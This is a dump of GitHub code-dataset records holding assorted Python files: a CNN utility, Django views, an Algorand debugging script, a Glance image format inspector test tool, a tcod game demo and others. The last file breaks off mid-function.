\"allow_search_indices\": False,\n \"allow_view\": True,\n \"allow_fine_tuning\": False,\n \"organization\": \"*\",\n \"group\": None,\n \"is_blocking\": False\n }\n ],\n \"root\": \"gpt-3.5-turbo\",\n \"parent\": None,\n })\n ret['data'].append({\n \"created\": 1671217299,\n \"id\": \"text-embedding-ada-002\",\n \"object\": \"model\",\n \"owned_by\": \"openai-internal\",\n \"permission\": [\n {\n \"created\": 1678892857,\n \"id\": \"modelperm-Dbv2FOgMdlDjO8py8vEjD5Mi\",\n \"object\": \"model_permission\",\n \"allow_create_engine\": False,\n \"allow_sampling\": True,\n \"allow_logprobs\": True,\n \"allow_search_indices\": True,\n \"allow_view\": True,\n \"allow_fine_tuning\": False,\n \"organization\": \"*\",\n \"group\": None,\n \"is_blocking\": False\n }\n ],\n \"root\": \"text-embedding-ada-002\",\n \"parent\": \"\"\n })\n\n return ret\n","repo_name":"yuanjie-ai/ChatLLM","sub_path":"chatllm/api/routes/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","stars":340,"dataset":"github-code","pt":"54"} +{"seq_id":"25837440574","text":"import numpy as np\nfrom gensim.models import Word2Vec\nfrom tensorflow.keras.callbacks import EarlyStopping\nfrom tensorflow.python.keras import regularizers\nfrom tensorflow.python.keras.layers import Dense, Embedding, Conv1D, MaxPooling1D, \\\n GlobalMaxPooling1D\nfrom tensorflow.python.keras.layers import Dropout\nfrom tensorflow.python.keras.models import Sequential\nfrom tensorflow.python.keras.optimizers import Adam\n\n\nclass CNNUtils:\n @staticmethod\n def tokens_to_string(tokens, p_tokenizer):\n inverse_map = dict(zip(p_tokenizer.word_index.values(), p_tokenizer.word_index.keys()))\n words = [inverse_map[token] for token in tokens if token != 0]\n text = ''.join(words)\n return text\n\n @staticmethod\n def 
get_word2vec_embedding_matrix(embedding_size, p_tokenizer, words_list):\n w2v_model = Word2Vec(words_list, min_count=1, size=embedding_size, workers=3, window=3, sg=1)\n model_save_location = \"vocabulary_vec\"\n w2v_model.wv.save_word2vec_format(model_save_location)\n word2vec = {}\n with open(model_save_location, encoding='UTF-8') as f:\n for line in f:\n values = line.split()\n word = values[0]\n vec = np.asarray(values[1:], dtype='float32')\n word2vec[word] = vec\n words_number = len(list(p_tokenizer.word_index))\n result_embedding_matrix = np.random.uniform(-1, 0, (words_number + 1, embedding_size))\n for word, i in p_tokenizer.word_index.items():\n if i < words_number:\n embedding_vector = word2vec.get(word)\n if embedding_vector is not None:\n result_embedding_matrix[i] = embedding_vector\n return result_embedding_matrix\n\n @staticmethod\n def build_model(p_tokenizer, p_embedding_matrix, p_max_tokens, number_of_classes, number_of_filters,\n p_weight_decay):\n cnn_model = Sequential()\n cnn_model.add(Embedding(input_dim=len(list(p_tokenizer.word_index)) + 1,\n output_dim=p_embedding_matrix.shape[1],\n weights=[p_embedding_matrix],\n input_length=p_max_tokens,\n trainable=True, # the layer is trained\n name='embedding_layer'))\n cnn_model.add(Conv1D(number_of_filters, 7, activation='relu', padding='same'))\n cnn_model.add(MaxPooling1D(2))\n cnn_model.add(Conv1D(number_of_filters, 7, activation='relu', padding='same'))\n cnn_model.add(GlobalMaxPooling1D())\n cnn_model.add(Dropout(0.5))\n cnn_model.add(Dense(32, activation='relu', kernel_regularizer=regularizers.l2(p_weight_decay)))\n cnn_model.add(Dense(number_of_classes, activation='softmax')) # multi-label (k-hot encoding)\n adam = Adam(lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0)\n cnn_model.compile(loss='sparse_categorical_crossentropy', optimizer=adam, metrics=['accuracy'])\n cnn_model.summary()\n # define callbacks\n early_stopping = EarlyStopping(monitor='val_loss', min_delta=0.01, patience=4, verbose=1)\n return cnn_model, [early_stopping]\n","repo_name":"smaranda-perju/CLEF2020-CheckThat-Lab-Team2","sub_path":"Sprint2/Experiments/Tweets_and_fake_news_classification/utility/cnn_utils.py","file_name":"cnn_utils.py","file_ext":"py","file_size_in_byte":3240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6287338393","text":"import useful_tools\nimport docx\n\n\nprint(useful_tools.roll_dice(10))\n\n\n\nclass Student:\n def __init__(self,name, major,gpa,is_on_prob):\n self.name = name \n self.major = major\n self.gpa = gpa\n self.is_on_prob = is_on_prob\n\n","repo_name":"keerthika06/pythton-basics","sub_path":"app1.py","file_name":"app1.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18068048199","text":"from __future__ import print_function\nfrom builtins import input\n\nimport numpy as np\n\nfrom sporco.admm import bpdn\nfrom sporco import plot\n\n\n\"\"\"\nConfigure problem size, sparsity, and noise level.\n\"\"\"\n\nN = 512 # Signal size\nM = 4*N # Dictionary size\nL = 32 # Number of non-zero coefficients in generator\nsigma = 0.5 # Noise level\n\n\n\"\"\"\nConstruct random dictionary, reference random sparse representation, and test signal consisting of the synthesis of the reference sparse representation with additive Gaussian noise.\n\"\"\"\n\n# Construct random dictionary and random sparse coefficients\nnp.random.seed(12345)\nD = 
np.random.randn(N, M)\nx0 = np.zeros((M, 1))\nsi = np.random.permutation(list(range(0, M-1)))\nx0[si[0:L]] = np.random.randn(L, 1)\n\n# Construct reference and noisy signal\ns0 = D.dot(x0)\ns = s0 + sigma*np.random.randn(N,1)\n\n\n\"\"\"\nSet :class:`.bpdn.BPDNProjL1` solver class options. The value of $\\gamma$ has been manually chosen for good performance.\n\"\"\"\n\ngamma = 2.5e1\nopt = bpdn.BPDNProjL1.Options({'Verbose': True, 'MaxMainIter': 500,\n 'RelStopTol': 1e-6, 'AutoRho': {'RsdlTarget': 1.0}})\n\n\n\"\"\"\nInitialise and run BPDNProjL1 object\n\"\"\"\n\nb = bpdn.BPDNProjL1(D, s, gamma, opt)\nx = b.solve()\n\nprint(\"BPDNProjL1 solve time: %.2fs\" % b.timer.elapsed('solve'))\n\n\n\"\"\"\nPlot comparison of reference and recovered representations.\n\"\"\"\n\nplot.plot(np.hstack((x0, x)), title='Sparse representation',\n lgnd=['Reference', 'Reconstructed'])\n\n\n\"\"\"\nPlot functional value, residuals, and rho\n\"\"\"\n\nits = b.getitstat()\nfig = plot.figure(figsize=(20, 5))\nplot.subplot(1, 3, 1)\nplot.plot(its.ObjFun, xlbl='Iterations', ylbl='Functional', fig=fig)\nplot.subplot(1, 3, 2)\nplot.plot(np.vstack((its.PrimalRsdl, its.DualRsdl)).T,\n ptyp='semilogy', xlbl='Iterations', ylbl='Residual',\n lgnd=['Primal', 'Dual'], fig=fig)\nplot.subplot(1, 3, 3)\nplot.plot(its.Rho, xlbl='Iterations', ylbl='Penalty Parameter', fig=fig)\nfig.show()\n\n\n# Wait for enter on keyboard\ninput()\n","repo_name":"bwohlberg/sporco","sub_path":"examples/scripts/sc/bpdnprjl1.py","file_name":"bpdnprjl1.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","stars":238,"dataset":"github-code","pt":"54"} +{"seq_id":"17801245801","text":"import sys\n\nn,m,h,k = map(int, input().split())\ns = list(input())\npotions = []\npos = [0,0]\nfor i in range(m):\n x,y = map(int, input().split())\n potions.append([x,y])\n\n\ndef move(char, pos):\n if char == \"R\":\n pos[0] += 1\n elif char == \"L\":\n pos[0] -= 1\n elif char == \"U\":\n pos[1] += 1\n elif char == \"D\":\n pos[1] -= 1\n return pos\n\nfor char in s:\n h -= 1\n\n if h < 0:\n print(\"No\")\n sys.exit(0)\n\n pos = move(char, pos)\n if pos in potions:\n if h < k:\n potions.remove(pos)\n h = k\n\nprint(\"Yes\")","repo_name":"mishio-n/atcoder","sub_path":"20230527/c copy.py","file_name":"c copy.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5443837846","text":"import argparse\nimport logging\nimport sys\n\nfrom oslo_utils import units\n\nfrom glance.common import format_inspector\nfrom glance.tests.unit.common import test_format_inspector\n\n\ndef main():\n formats = ['raw', 'qcow2', 'vhd', 'vhdx', 'vmdk', 'vdi']\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-d', '--debug', action='store_true')\n parser.add_argument('-f', '--format', default='raw',\n help='Format (%s)' % ','.join(sorted(formats)))\n parser.add_argument('-b', '--block-size', default=65536, type=int,\n help='Block read size')\n parser.add_argument('--context-limit', default=(1 * 1024), type=int,\n help='Maximum memory footprint (KiB)')\n parser.add_argument('-i', '--input', default=None,\n help='Input file. 
Defaults to stdin')\n parser.add_argument('-v', '--verify', action='store_true',\n help=('Verify our number with qemu-img '\n '(requires --input)'))\n args = parser.parse_args()\n\n if args.debug:\n logging.basicConfig(level=logging.DEBUG)\n else:\n logging.basicConfig(level=logging.INFO)\n\n fmt = format_inspector.get_inspector(args.format)(tracing=args.debug)\n\n if args.input:\n input_stream = open(args.input, 'rb')\n else:\n input_stream = sys.stdin.buffer\n\n stream = format_inspector.InfoWrapper(input_stream, fmt)\n count = 0\n found_size = False\n while True:\n chunk = stream.read(int(args.block_size))\n # This could stream to an output destination or stdin for testing\n # sys.stdout.write(chunk)\n if not chunk:\n break\n count += len(chunk)\n if args.format != 'raw' and not found_size and fmt.virtual_size != 0:\n # Print the point at which we've seen enough of the file to\n # know what the virtual size is. This is almost always less\n # than the raw_size\n print('Determined virtual size at byte %i' % count)\n found_size = True\n\n if fmt.format_match:\n print('Source was %s file, virtual size %i MiB (%i bytes)' % (\n fmt, fmt.virtual_size / units.Mi, fmt.virtual_size))\n else:\n print('*** Format inspector did not detect file as %s' % args.format)\n\n print('Raw size %i MiB (%i bytes)' % (fmt.actual_size / units.Mi,\n fmt.actual_size))\n print('Required contexts: %s' % str(fmt.context_info))\n mem_total = sum(fmt.context_info.values())\n print('Total memory footprint: %i bytes' % mem_total)\n\n # To make sure we're not storing the whole image, complain if the\n # format inspector stored more than context_limit data\n if mem_total > args.context_limit * 1024:\n print('*** ERROR: Memory footprint exceeded!')\n\n if args.verify and args.input:\n size = test_format_inspector.get_size_from_qemu_img(args.input)\n if size != fmt.virtual_size:\n print('*** QEMU disagrees with our size of %i: %i' % (\n fmt.virtual_size, size))\n else:\n print('Confirmed size with qemu-img')\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"openstack/glance","sub_path":"tools/test_format_inspector.py","file_name":"test_format_inspector.py","file_ext":"py","file_size_in_byte":3215,"program_lang":"python","lang":"en","doc_type":"code","stars":501,"dataset":"github-code","pt":"54"} +{"seq_id":"15517850063","text":"from django.contrib import admin\nfrom movies.api.viewsets import MoviesList, RatingList, TotalRating, NoRateList\nfrom django.urls import path, include\nfrom rest_framework import routers\n\nroute = routers.DefaultRouter()\nroute.register(r'movies', MoviesList, basename=\"Movies\") #/movies\n\nroute_rating = routers.DefaultRouter()\nroute_rating.register(r'rate', RatingList, basename=\"Rates\") #/rate\n\nroute_total = routers.DefaultRouter()\nroute_total.register(r'total', TotalRating, basename=\"Total\") #/total\n\nroute_norate = routers.DefaultRouter()\nroute_norate.register(r'norate', NoRateList, basename='NoRate' ) #/norate\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', include(route.urls)), #movies\n path('', include(route_rating.urls)), #rate\n path('movies//', include(route_total.urls)),\n path('', include(route_norate.urls)),#norate\n]","repo_name":"GusGBalbino/MoviesDjangoAPI","sub_path":"library/library/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31054918967","text":"class Solution:\n def removeKdigits(self, num: str, 
k: int) -> str:\n stack = []\n for x in num:\n while stack and int(x) < int(stack[-1]) and k!=0:\n k-=1\n stack.pop()\n stack.append(x)\n stack = stack[:len(stack)-k]\n ans = \"\".join(stack)\n return str(int(ans)) if ans else \"0\"\n","repo_name":"jossyfresh/competetive-programing","sub_path":"MoveKDigits.py","file_name":"MoveKDigits.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6844924348","text":"import json\n\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\n\n# Create your views here.\nfrom django.utils.decorators import method_decorator\nfrom django.views import View\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom .models import Restaurant\n\nclass RestaurantView(View):\n\n @method_decorator(csrf_exempt)\n def dispatch(self, request, *args, **kwargs): #Modifica el comportamiento y salte restriccion\n return super().dispatch(request, *args, **kwargs)\n\n def get(self, request, id=0):\n if(id > 0):\n restaurants = list(Restaurant.objects.filter(id=id).values())\n if len(restaurants) > 0: #Si la longitud de restaurant\n restaurant = restaurants[0]\n datos = {'message': \"Success\", \"restaurant\": restaurant}\n else:\n datos = {'message': \"Not found..\"}\n return JsonResponse(datos)\n else:\n restaurants = list(Restaurant.objects.values()) #Serializamos json\n if len(restaurants) > 0:\n datos = {'message': \"Succes\", 'restaurants': restaurants}\n else:\n datos = {'message': \"Companies not found..\"}\n return JsonResponse(datos)\n\n def post(self, request):\n jdata = json.loads(request.body)\n Restaurant.objects.create(name=jdata['name'],\n type_restaurant=jdata['type_restaurant'],\n address=jdata['address'], phone=jdata['phone'] )\n datos = {'message': \"Success\"}\n return JsonResponse(datos)\n\n def put(self, request, id):\n jdata = json.loads(request.body)\n restaurants = list(Restaurant.objects.filter(id=id).values())\n if len(restaurants) > 0:\n restaurant = Restaurant.objects.get(id=id)\n restaurant.name = jdata['name']\n restaurant.type_restaurant = jdata['type_restaurant']\n restaurant.address = jdata['address']\n restaurant.phone = jdata['phone']\n restaurant.save()\n datos = {'message': \"Succes\"}\n else:\n datos = {'message': \"Not found..\"}\n return JsonResponse(datos)\n\n def delete(self, request, id):\n restaurants = list(Restaurant.objects.filter(id=id).values())\n if len(restaurants) > 0:\n Restaurant.objects.filter(id=id).delete()\n datos = {'message': \"Succes\"}\n else:\n datos = {'message': \"Companies not found..\"}\n return JsonResponse(datos)","repo_name":"danyelJoy/ApiRestaurant","sub_path":"restaurant/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"155790057","text":"import pandas as pd\nfrom ipedstable import IpedsTable\nfrom copy import copy, deepcopy\n\n\nclass IpedsCollection(object):\n ''' A collection of multiple IpedsTables '''\n\n def __init__(self):\n self.meta = {}\n self.merged_table = IpedsTable(df=pd.DataFrame())\n\n def update_meta(\n self,\n name,\n table=None,\n filepath=None,\n keep_columns=None,\n map_values=None,\n col_levels = None,\n filter_values = None,\n category_columns = None,\n exclude_imputations=None):\n\n if name not in self.meta.keys():\n self.meta.update({name: {}})\n entry = self.meta[name]\n\n if table:\n if isinstance(table, 
IpedsTable):\n entry.update({'table': deepcopy(table)})\n else:\n raise TypeError('table must be an instance of IpedsTable')\n\n if filepath:\n entry.update({'filepath': filepath})\n\n if keep_columns:\n if isinstance(keep_columns, list)\\\n and ('unitid' not in keep_columns):\n keep_columns.append('unitid')\n entry.update({'keep_columns': keep_columns})\n\n if col_levels:\n entry.update({'col_levels': col_levels})\n\n if filter_values:\n entry.update({'filter_values': filter_values})\n\n if map_values:\n entry.update({'map_values': map_values})\n\n if category_columns:\n entry.update({'category_columns': category_columns})\n\n if exclude_imputations:\n entry.update({'exclude_imputations': exclude_imputations})\n\n def drop_meta(self, name):\n del self.meta[name]\n\n def get_row_counts(self):\n counts = dict([])\n for k in self.meta.keys():\n df = self.meta[k]['table'].df.copy()\n counts.update({k: {'all': len(df)}})\n df.dropna(how='any',inplace=True)\n counts[k].update({'full': len(df)})\n return counts\n\n def import_table(self, name):\n print(f\"importing table {name}\")\n entry = self.meta[name]\n if 'filepath' in entry.keys():\n table = IpedsTable(filepath=entry['filepath'])\n self.update_meta(name, table=table)\n del entry['filepath']\n\n def import_all(self):\n for name in self.meta.keys():\n self.import_table(name)\n\n def make_multicols(self, name):\n entry = self.meta[name]\n self._validate_table_import(name)\n if 'col_levels' in entry.keys():\n table = entry['table']\n col_levels = copy(entry['col_levels'])\n if 'unitid' in entry['col_levels']:\n col_levels.remove('unitid')\n col_levels.insert(0,'unitid')\n table.make_multicols(col_levels)\n\n def make_multicols_all(self):\n for name in self.meta.keys():\n print(f\"making multicols for {name}\")\n self.make_multicols(name)\n\n def clean_table(self, name, dropna=False):\n print(f\"cleaning table {name}\")\n # self.import_table(name)\n entry = self.meta[name]\n table = entry['table']\n if entry['keep_columns'] == 'all':\n entry['keep_columns'] = table.columns\n table.keep_columns(entry['keep_columns'])\n table.purge_imputations(entry['exclude_imputations'], how='all')\n if dropna:\n table.dropna(entry['keep_columns'], how='any')\n \n def clean_all(self, dropna=False):\n for name in self.meta.keys():\n self.clean_table(name, dropna=dropna)\n\n def filter_values(self, name):\n print(f\"filtering values in table {name}\")\n self._validate_table_import(name)\n entry = self.meta[name]\n if 'filter_values' in entry.keys():\n table = entry['table']\n table.filter_values(entry['filter_values'])\n\n def filter_all(self):\n for name in self.meta.keys():\n self.filter_values(name)\n\n def map_values(self, name):\n print(f\"mapping values in table {name}\")\n entry = self.meta[name]\n if 'map_values' in entry.keys():\n table = entry['table']\n table.map_values(entry['map_values'])\n\n def map_values_all(self):\n for name in self.meta.keys():\n self.map_values(name)\n\n def encode_columns(self, name):\n print(f\"encoding categorical columns in table {name}\")\n entry = self.meta[name]\n if 'category_columns' in entry.keys():\n table = entry['table']\n table.encode_columns(entry['category_columns'])\n\n def encode_columns_all(self):\n for name in self.meta.keys():\n self.encode_columns(name)\n\n def _validate_table_import(self, name):\n if 'table' not in self.meta[name].keys():\n raise KeyError('Table has not been imported.')\n\n def merge_table(self, name, how='inner', keep_table=True):\n print(f\"Merging {name} with merged_table\")\n 
self._validate_table_import(name)\n table = deepcopy(self.meta[name]['table'])\n if len(self.merged_table) == 0:\n self.merged_table.df = table.df\n else:\n self.merged_table.df = self.merged_table.df.merge(\n table.df,\n how=how,\n on='unitid',\n suffixes=('', '_'+name))\n if not keep_table:\n self.drop_meta(name)\n\n def merge_all(self, how='inner', keep_table=True):\n for name in self.meta.keys():\n self.merge_table(name, \n how=how, \n keep_table=keep_table)\n\n def pipeline_all(self, dropna=False, how='inner', keep_table=True):\n self.import_all()\n self.clean_all()\n self.map_values_all()\n self.filter_all()\n self.encode_columns_all()\n self.make_multicols_all()\n self.merge_all(how=how, keep_table=keep_table)\n","repo_name":"Fred-B-Berendse/ipeds_library","sub_path":"src/ipedscollection.py","file_name":"ipedscollection.py","file_ext":"py","file_size_in_byte":6022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10878329176","text":"from algosdk.v2client import algod\nfrom algosdk.dryrun_results import DryrunResponse, StackPrinterConfig\nfrom algosdk.atomic_transaction_composer import (\n AtomicTransactionComposer,\n TransactionWithSigner,\n)\nfrom algosdk.future import transaction\nfrom util import (\n create_app,\n create_asa,\n get_approval_program,\n get_clear_program,\n get_contract,\n)\nfrom beaker import sandbox\nfrom beaker.client.logic_error import LogicException\n\n\ndef main():\n # setup\n algod_client = sandbox.clients.get_algod_client()\n acct = sandbox.kmd.get_accounts().pop()\n\n approval_program, approval_bin, approval_map = get_approval_program(algod_client)\n _, clear_bin, _ = get_clear_program(algod_client)\n\n contract = get_contract()\n\n app_id, app_addr = create_app(\n algod_client,\n acct.address,\n acct.private_key,\n approval_bin,\n clear_bin,\n transaction.StateSchema(1, 0),\n transaction.StateSchema(0, 0),\n )\n\n asa_id = create_asa(\n algod_client, acct.address, acct.private_key, \"tmp_asset\", \"tmp\", 10000, 0\n )\n\n sp = algod_client.suggested_params()\n\n # TODO: Need to cover fees for the inner transaction (uncomment these lines)\n # sp.flat_fee = True # Tell the SDK we know exactly what our fee should be\n # sp.fee = 2000 # Cover 2 transaction (outer + inner)\n\n # Create transaction to bootstrap application\n atc = AtomicTransactionComposer()\n atc.add_method_call(\n app_id,\n contract.get_method_by_name(\"bootstrap\"),\n acct.address,\n sp,\n signer=acct.signer,\n # TODO: the asset id should be passed\n method_args=[0],\n # method_args=[asa_id],\n )\n\n try:\n atc.execute(algod_client, 4)\n except Exception as e:\n le = LogicException(e, approval_program, approval_map)\n print(\n f\"A Logic Exception was encountered: '{le.msg[:40]}...'\\n\\t{le.trace()}\\n\"\n )\n perform_dryrun(atc, algod_client)\n return\n\n # Create group transaction to send asset and call method\n atc = AtomicTransactionComposer()\n atc.add_method_call(\n app_id,\n contract.get_method_by_name(\"transfer\"),\n acct.address,\n sp,\n signer=acct.signer,\n method_args=[\n TransactionWithSigner(\n # TODO: make this not fail\n txn=transaction.AssetTransferTxn(acct.address, sp, app_addr, 9, asa_id),\n # txn=transaction.AssetTransferTxn(acct.address, sp, app_addr, 10, asa_id),\n signer=acct.signer,\n ),\n asa_id,\n ],\n )\n try:\n atc.execute(algod_client, 4)\n except Exception as e:\n le = LogicException(e, approval_program, approval_map)\n print(\n f\"A Logic Exception was encountered: 
'{le.msg[:55]}...'\\n\\t{le.trace()}\\n\"\n )\n perform_dryrun(atc, algod_client)\n return\n\n # Create group transaction to send asset and call method\n # See TODO in contracts/application.py\n atc = AtomicTransactionComposer()\n atc.add_method_call(\n app_id,\n contract.get_method_by_name(\"withdraw\"),\n acct.address,\n sp,\n signer=acct.signer,\n method_args=[asa_id],\n )\n try:\n atc.execute(algod_client, 4)\n except Exception as e:\n le = LogicException(e, approval_program, approval_map)\n print(\n f\"A Logic Exception was encountered: '{le.msg[:50]}...'\\n\\t{le.trace()}\\n\"\n )\n perform_dryrun(atc, algod_client)\n return\n\n\ndef perform_dryrun(atc: AtomicTransactionComposer, client: algod.AlgodClient):\n signed = atc.gather_signatures()\n drr = transaction.create_dryrun(client, signed)\n dryrun_result = DryrunResponse(client.dryrun(drr))\n for txn in dryrun_result.txns:\n if txn.app_call_rejected():\n print(txn.app_trace(StackPrinterConfig(max_value_width=0)))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"algorand-devrel/debugging","sub_path":"py/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"37028884422","text":"import disnake\nfrom disnake.ext import commands\n\nbot = commands.Bot(\"!\")\n\n@bot.slash_command(\n name=\"슬래쉬 커맨드\",\n description=\"간단한 예제\",\n options=[\n disnake.Option(\"문자열\", description=\"문자열\", required=True),\n disnake.Option(\n \"채널\", description=\"채널\", type=disnake.OptionType.channel\n ),\n disnake.Option(\n \"숫자\", description=\"숫자\", type=disnake.OptionType.integer\n ),\n ],\n)\nasync def command(inter, string, channel=None, number=1):\n channel = channel or inter.channel\n await inter.response.send_message(\n f\"Sending {string} {number}x to {channel.mention}\", ephemeral=True\n )\n await channel.send(string * number)","repo_name":"battlebotdev/DiscordPython","sub_path":"Disnake/Old SlashCommand Example.py","file_name":"Old SlashCommand Example.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"27969163413","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport petcolormaps\n\ncmap_names = [x for x in dir(petcolormaps) if x.count('_')==2]\n\n\ngradient = np.linspace(0, 1, 256)\ngradient = np.vstack((gradient, gradient))\ndef plot_color_gradients(cmap_list, nrows):\n fig, axes = plt.subplots(nrows=nrows, figsize=(8,0.3*nrows))\n fig.subplots_adjust(top=0.95, bottom=0.01, left=0.2, right=0.99)\n\n for ax, name in zip(axes, cmap_list):\n ax.imshow(gradient, aspect='auto', cmap=\n \teval('petcolormaps.%s'%name))\n pos = list(ax.get_position().bounds)\n x_text = pos[0] - 0.01\n y_text = pos[1] + pos[3]/2.\n fig.text(x_text, y_text, name, va='center', ha='right', fontsize=10)\n\n # Turn off *all* ticks & spines, not just the ones with colormaps.\n for ax in axes:\n ax.set_axis_off()\n\nplot_color_gradients(cmap_names, len(cmap_names))\nplt.savefig('all_colormaps.png')\n","repo_name":"juliusbierk/petcolormaps","sub_path":"print_all_colormaps.py","file_name":"print_all_colormaps.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6881026836","text":"import tcod\n\ndef main():\n width, height = 80, 60\n x, y = 40, 30\n \n # Load the font from a file\n 
tcod.console_set_custom_font('data\\dejavu10x10_gs_tc.png', tcod.FONT_TYPE_GREYSCALE | tcod.FONT_LAYOUT_TCOD)\n\n # Initialize the root console\n console = tcod.console_init_root(width, height, 'GPT RL', False)\n\n # Set the background color of the console\n console.bg[0:width, 0:height] = tcod.Color(0, 0, 0)\n\n # Set the foreground color of the console\n console.fg[0:width, 0:height] = tcod.Color(255, 255, 255)\n\n while not tcod.console_is_window_closed():\n # Clear the console\n console.clear()\n\n # Wait for key press and release\n key = tcod.console_wait_for_keypress(True)\n\n # Move the character based on the input\n if key.vk == tcod.KEY_UP:\n y = max(0, y - 1)\n elif key.vk == tcod.KEY_DOWN:\n y = min(height - 1, y + 1)\n elif key.vk == tcod.KEY_LEFT:\n x = max(0, x - 1)\n elif key.vk == tcod.KEY_RIGHT:\n x = min(width - 1, x + 1)\n\n # Draw a character on the console\n console.put_char(x, y, 64)\n\n # Blit the console to the root console (i.e., the main screen)\n tcod.console_blit(console, x, y, width, height, 40, 30, 0)\n\n # Update the screen\n tcod.console_flush()\n\n print(x, y)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Touff-97/GPT-RL","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"3891678195","text":"# Import python libraries\nimport time\nimport math\nimport copy\nimport queue\nimport argparse\nimport random as rnd\n\n# Import RapidChiplet files\nimport helpers as hlp\nimport validation as vld\n\n# Compute the area summary\ndef compute_area_summary(chiplets, placement):\n\ttotal_chiplet_area = 0\n\t# Smallest and largest coordinates occupied by a chiplet\n\t(minx, miny, maxx, maxy) = (float(\"inf\"),float(\"inf\"),-float(\"inf\"),-float(\"inf\"))\n\t# Iterate through chiplets\n\tfor chiplet_desc in placement[\"chiplets\"]:\n\t\tchiplet = chiplets[chiplet_desc[\"name\"]]\n\t\t(x,y) = (chiplet_desc[\"position\"][\"x\"],chiplet_desc[\"position\"][\"y\"])\t# Position\n\t\t(w,h) = (chiplet[\"dimensions\"][\"x\"],chiplet[\"dimensions\"][\"y\"])\t\t\t# Dimensions\n\t\t# Add this chiplet's are to total area\n\t\ttotal_chiplet_area += (w * h)\n\t\t# Update min and max coordinates\n\t\tminx = min(minx, x)\n\t\tminy = min(miny, y)\n\t\tmaxx = max(maxx, x + w)\n\t\tmaxy = max(maxy, y + h)\n\t# Compute total interposer area\n\tchip_width = (maxx - minx)\n\tchip_height = (maxy - miny)\n\ttotal_interposer_area = chip_width * chip_height\n\tarea_summary = {\n\t\t\"chip_width\" : chip_width,\t\n\t\t\"chip_height\" : chip_height,\t\n\t\t\"total_chiplet_area\" : total_chiplet_area,\n\t\t\"total_interposer_area\" : total_interposer_area\n\t}\n\treturn area_summary\n\n# Compute the power summary\ndef compute_power_summary(chiplets, placement, packaging):\n\t# Compute power consumption of chiplets\n\ttotal_chiplet_power = 0\n\tfor chiplet_desc in placement[\"chiplets\"]:\n\t\tchiplet = chiplets[chiplet_desc[\"name\"]]\n\t\ttotal_chiplet_power += chiplet[\"power\"]\t\n\t# Compute power consumption of interposer routers\n\ttotal_interposer_power = (len(placement[\"interposer_routers\"]) * packaging[\"power_irouter\"]) if packaging[\"is_active\"] else 0\n\t# Compute total interposer area\n\ttotal_power = total_chiplet_power + total_interposer_power \n\tpower_summary = {\n\t\t\"total_power\" : total_power,\n\t\t\"total_chiplet_power\" : total_chiplet_power,\n\t\t\"total_interposer_power\" : total_interposer_power\n\t}\n\treturn 
power_summary\n\n# Compute all link lengths\ndef compute_link_summary(chiplets, placement, topology, packaging):\n\tlink_lengths = []\n\tlink_lengths_internal = {}\n\tfor link in topology:\n\t\tendpoints = [link[\"ep1\"],link[\"ep2\"]]\n\t\t# Compute positions of start-and endpoint\n\t\tpositions = []\n\t\tnode_ids = []\n\t\tfor endpoint in endpoints:\n\t\t\tif endpoint[\"type\"] == \"chiplet\":\n\t\t\t\tchiplet_desc = placement[\"chiplets\"][endpoint[\"outer_id\"]]\n\t\t\t\tchiplet = chiplets[chiplet_desc[\"name\"]]\n\t\t\t\t# Rotate the chiplet if needed\t\n\t\t\t\tchiplet = hlp.rotate_chiplet(chiplet, chiplet_desc[\"rotation\"])\n\t\t\t\tphy = chiplet[\"phys\"][endpoint[\"inner_id\"]]\n\t\t\t\tpositions.append((chiplet_desc[\"position\"][\"x\"] + phy[\"x\"],chiplet_desc[\"position\"][\"y\"] + phy[\"y\"]))\n\t\t\t\tnode_ids.append(endpoint[\"outer_id\"])\n\t\t\telse:\n\t\t\t\tirouter = placement[\"interposer_routers\"][endpoint[\"outer_id\"]]\n\t\t\t\tpositions.append((irouter[\"position\"][\"x\"],irouter[\"position\"][\"y\"]))\n\t\t\t\tnode_ids.append(len(placement[\"chiplets\"]) + endpoint[\"outer_id\"])\n\t\t# Compute link length\n\t\tif packaging[\"link_routing\"] == \"manhattan\":\n\t\t\tlength = sum([abs(positions[0][dim] - positions[1][dim]) for dim in range(2)])\n\t\t\tlink_lengths.append(length)\n\t\t\tlink_lengths_internal[tuple(node_ids)] = length\n\t\t\tlink_lengths_internal[tuple(reversed(node_ids))] = length\n\t\telif 